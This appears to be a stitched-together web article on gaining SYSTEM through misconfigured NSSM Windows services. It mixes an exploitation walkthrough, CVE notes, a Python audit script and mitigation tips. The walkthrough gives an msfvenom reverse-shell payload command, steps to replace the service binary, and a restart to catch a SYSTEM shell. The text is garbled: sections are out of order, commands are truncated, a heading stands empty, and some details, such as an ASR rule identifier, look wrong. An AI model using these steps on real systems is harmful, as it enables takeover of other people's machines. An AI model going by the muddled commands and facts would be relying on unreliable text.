NSSM 2.24 ("nssm224") Privilege Escalation | Updated
This guide outlines how to identify and exploit misconfigurations in the Non-Sucking Service Manager (NSSM), often referred to as "nssm224" (referring to outdated versions), to elevate privileges from a standard user to SYSTEM on Windows systems.

1. Understanding the Vulnerability
NSSM is used to run applications as Windows services. Privilege escalation occurs if the service is configured to run as LocalSystem but points to an executable or DLL that a low-privileged user can modify.

Common misconfigurations:
- Unquoted service paths: the service path contains spaces and lacks quotes, allowing a malicious executable to be placed earlier in the path.
- Weak file permissions: the executable or its directory allows write access (W or F) for the Authenticated Users or Users groups.

2. Enumeration (Finding the Target)
First, identify services managed by NSSM that run as SYSTEM and have weak permissions. Use the command prompt or PowerShell.

List service details:

wmic service get name,displayname,pathname,startmode | findstr /i "auto"

Check permissions on executables: use icacls to check whether your user has write access to the service binary.

icacls "C:\Path\To\Service\Binary.exe"

Look for (F) (full access) or (W) (write access) granted to the Users group.

3. Exploitation Steps (Updated Approach)

Once a vulnerable service is found, follow these steps:
Create a malicious payload: generate a reverse shell using msfvenom, or a simple executable that adds a user to the Administrators group.

msfvenom -p windows/x64/shell_reverse_tcp LHOST=

Replace the service binary: replace the legitimate executable with your payload.

move "C:\Path\To\Service\Binary.exe" "C:\Path\To\Service\Binary.exe.bak"
copy "C:\Temp\service.exe" "C:\Path\To\Service\Binary.exe"

Restart the service: if you have permission to restart the service, do so; if not, wait for a system reboot.

sc stop

Obtain shell: catch the reverse shell as NT AUTHORITY\SYSTEM.

4. Prevention and Mitigation
- Quote service paths: ensure all service binary paths are enclosed in quotes to prevent unquoted service path attacks.
- Restrict permissions: apply the principle of least privilege; only administrators should have write access to service directories and binaries.
- Update NSSM: use the latest version of NSSM, which includes security improvements over older versions ("nssm224").
Exploiting the "Non-Sucking Service Manager": A Look at NSSM-Based Privilege Escalation

Non-Sucking Service Manager (NSSM) is a beloved tool in the Windows administration world for its simplicity in turning any executable into a background service. However, recent disclosures have highlighted how improper deployment of NSSM can become a high-speed lane for Local Privilege Escalation (LPE).
If you are managing Windows environments, here is the updated breakdown of how these vulnerabilities work and how to lock them down.

1. The Core Vulnerability: Weak File Permissions

The most common way NSSM is abused isn't through a bug in the code itself, but through improper file permissions during installation.
- Installers for various software packages (such as Phoenix Contact or Wowza Streaming Engine) sometimes place nssm.exe in directories where the "Everyone" or "Authenticated Users" group has "Write" or "Full Control" permissions.
- The exploit: a low-privileged user can simply rename the original nssm.exe and replace it with a malicious binary (e.g., a reverse shell) under the same name.
- The escalation: when the system reboots or the service restarts, the Windows Service Control Manager executes the malicious file with Administrator privileges.

2. Unquoted Service Paths
Another classic attack vector involves how NSSM is registered in the Windows registry.
- If a service path containing spaces is not enclosed in quotation marks (e.g., C:\Program Files\My Service\nssm.exe), Windows may attempt to execute files at each space-delimited break.
- The exploit: an attacker with write access to the root directory could place a malicious file at C:\Program.exe. When the service tries to start, Windows may execute C:\Program.exe instead of the intended file deep in the Program Files directory.

3. Persistence via NSSM

Beyond escalation, threat actors frequently use NSSM for persistence. Because it is a legitimate, signed tool, it often bypasses basic security filters. Attackers use it to ensure their backdoors or coinminers (like XMRig) stay running even if the process crashes or the system reboots.

Recent notable CVEs:

- CVE-2025-41686, Phoenix Contact DAUM: low-privileged local users gain admin access via improper permissions.
- CVE-2016-20033, Wowza Streaming Engine (updated 2026): verified exploitation via "Everyone" group full access to service binaries.
- CVE-2016-8742, Apache CouchDB: local users could substitute the NSSM binary due to inherited parent directory permissions.

How to Defend Your Systems
To prevent your service manager from becoming a security liability, follow these best practices:
Related MITRE ATT&CK technique: T1068, Exploitation for Privilege Escalation (Enterprise).
Here’s a concise technical overview regarding NSSM (Non-Sucking Service Manager) version 2.24 and its potential use in privilege escalation scenarios (updated perspective):
7. Conclusion
NSSM 224 is not inherently vulnerable, but common deployment patterns create local privilege escalation paths. Sysadmins must check service and registry permissions when using any service wrapper.
Step 2: Check Permissions on the Service
sc.exe sdshow nssm_managed_service
Look for (A;;RPWP;;;WD) or (A;;RPWPDT;;;AU) – these allow authenticated users to modify service configuration.
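The following Python script is an added example, not code from this page or the NSSM project: it applies the two audit checks described above (the unquoted-path test on the service binary path from the enumeration section, and a review of the DACL that sc sdshow prints) to constructed sample records, offline. It separates rights that let a low-privileged user stop or start the service (RP, WP, DT) from rights that let them rewrite its configuration or ACL (DC, SD, WD, WO), and it ignores the S: part of the descriptor, which holds audit ACEs rather than grants.

```python
import re

# Well-known SID abbreviations that stand for "any low-privileged local user".
LOW_PRIV_SIDS = {"WD": "Everyone", "AU": "Authenticated Users", "BU": "Users", "IU": "Interactive"}
# Service rights that let a caller restart the service (RP/WP/DT) vs. rewrite its config or ACL.
CONTROL_RIGHTS = {"RP": "start", "WP": "stop", "DT": "pause/continue"}
CONFIG_RIGHTS = {"DC": "change config", "SD": "delete", "WD": "write DACL", "WO": "write owner", "GA": "generic all", "FA": "full access"}
# One SDDL ACE: (type;flags;rights;object_guid;inherit_guid;sid)
ACE_RE = re.compile(r"\((\w+);([^;]*);([^;]*);([^;]*);([^;]*);([^)]+)\)")

def unquoted_path_with_spaces(path):
    """True when the path is unquoted and the part up to the .exe contains a space."""
    exe_part = re.split(r"\.exe", path, maxsplit=1, flags=re.IGNORECASE)[0]
    return not path.startswith('"') and " " in exe_part

def dacl_aces(sddl):
    """Yield (ace_type, rights, sid) from the D: part only; S: (audit ACEs) is ignored."""
    dacl = sddl.split("S:", 1)[0]
    dacl = dacl.split("D:", 1)[1] if "D:" in dacl else ""
    for m in ACE_RE.finditer(dacl):
        yield m.group(1), m.group(3), m.group(6)

def risky_aces(sddl):
    """Findings for allow-ACEs granting control or config rights to low-privileged SIDs."""
    findings = []
    for ace_type, rights, sid in dacl_aces(sddl):
        if ace_type != "A" or sid not in LOW_PRIV_SIDS:
            continue  # deny ACEs and admin/service SIDs are not a concern here
        tokens = [rights[i:i + 2] for i in range(0, len(rights), 2)]  # hex masks match nothing
        ctrl = [CONTROL_RIGHTS[t] for t in tokens if t in CONTROL_RIGHTS]
        cfg = [CONFIG_RIGHTS[t] for t in tokens if t in CONFIG_RIGHTS]
        if ctrl:
            findings.append(f"{LOW_PRIV_SIDS[sid]} can {'/'.join(ctrl)} the service")
        if cfg:
            findings.append(f"{LOW_PRIV_SIDS[sid]} can {'/'.join(cfg)}")
    return findings

def audit_service(path, sddl):
    """Unquoted-path check plus SDDL check for one service record."""
    findings = ["unquoted binary path with spaces"] if unquoted_path_with_spaces(path) else []
    return findings + risky_aces(sddl)

# Constructed sample records (hypothetical services, not output from any real host).
SAMPLE_SERVICES = {
    "GoodApp": (r'"C:\Program Files\Good App\nssm.exe"',
                "D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCLCSWLOCRRC;;;IU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)"),
    "WeakApp": (r"C:\Program Files\Weak App\nssm.exe",
                "D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;RPWPDT;;;AU)(A;;DC;;;WD)"),
}
for name, (path, sddl) in SAMPLE_SERVICES.items():
    print(name, "->", audit_service(path, sddl) or ["no findings"])
```

On a real host, feed it the pathname column from the wmic query and the string returned by sc.exe sdshow for each service; a service with no findings still needs the icacls check on the binary itself, which this script does not perform.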
3. Attack Surface in NSSM 224
1. Upgrade NSSM
- Use NSSM 2.24.1 or later (unofficial patches from community builds). Better yet, migrate to native Windows services or sc.exe.
4. Enable Attack Surface Reduction (ASR) Rules
Set-MpPreference -AttackSurfaceReductionRules_Ids 3B576869-A4EC-41E9-8E09-387D72F48587 -AttackSurfaceReductionRules_Actions Enabled
This rule blocks “Process creations from PSExec and WMI commands” – also catches NSSM-based service tampering in some builds.